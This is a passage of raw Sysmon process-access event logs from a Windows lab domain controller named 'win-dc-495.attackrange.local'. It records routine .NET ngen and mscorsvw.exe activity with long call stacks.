d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.619{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920E-6005-9403-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:06.619{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920E-6005-9403-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:06.275{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920E-6005-9303-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:06.181{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920E-6005-9303-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:06.181{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920E-6005-9303-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.978{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-A003-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.978{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-A003-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.947{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9F03-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.947{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9F03-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.947{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9F03-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.885{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9E03-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.869{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9E03-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.869{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9E03-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9D03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.806{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9D03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.806{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9D03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.603{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9C03-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.588{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9C03-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.588{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9C03-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.510{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9B03-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.494{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9B03-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.494{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9B03-00000000A301}4700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9A03-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTE